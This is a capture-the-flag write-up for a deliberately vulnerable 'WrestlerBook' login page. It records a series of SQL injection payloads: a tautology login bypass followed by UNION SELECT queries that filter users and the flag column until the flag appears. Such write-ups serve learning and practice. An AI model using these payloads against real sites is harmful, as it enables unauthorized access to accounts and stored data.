


“WrestlerBook is the social network for wrestlers, by wrestlers. WrestlerBook is exclusively for wrestlers, so if you didn’t get an invite don’t even bother trying to view our profile.”


First thing I try on here is a simple ‘ OR 1=1 – which gets us into hulk hogan. There is a flag attribute that he doesnt have. After trying a lot of different injections I finally crafted this:
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’) --
which brought us to a new page who is Jim Duggan and who also doesnt have a flag. My guess is we keep adding these users to the list of users we dont want. Maybe we will soon get a user with a flag.
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’) --
next username still no flag: machoasf
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’) --
Another one:milliondollarman
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’) --
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’, ‘rich_flair’) --
‘user1’: George Steele
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’, ‘rich_flair’, ‘user1’, ‘user10’, ‘user100’,’user101’,’user102’, ‘user103’, ‘user104’, ‘user105’,’user106’,’user107’,’user108’,’user109’) --
New idea is to check who isnt in the first set of users and who dont have the name user in their username
‘ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’, ‘rich_flair’) AND username NOT LIKE ‘user%’ --
SELECT * FROM users WHERE username = ‘’ UNION SELECT * FROM users WHERE username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’, ‘rich_flair’) AND username NOT LIKE ‘user%’ ‘ and password = ‘’ OR 1=1 --’
SELECT * FROM users WHERE username = ‘
‘ UNION SELECT * FROM users WHERE username NOT LIKE ‘user%’ AND username NOT IN (‘hulkhogie’, ‘hacksawjim’, ‘machoasf’, ‘milliondollarman’, ‘rich_flair’) ‘ and password = ‘‘
NOW: write query filtering something else than username

’ UNION SELECT * FROM users WHERE password LIKE ‘%sun% ‘
After filtering based on ID I notied that the profiles were coming up in the same exact order as they were when I filtered by username which made me realize the other things listed must also be parts of the databse. I reconstructed this query below

’ UNION SELECT * FROM users WHERE flag NOT LIKE ‘N%’ AND flag NOT LIKE ‘ex%’ --
FINALLY when using the query above we get:
“Generic Wrestler Username: user84 Age: 65 Title: N/A Flag: sun{ju57_4n07h3r_5ql1_ch4ll}”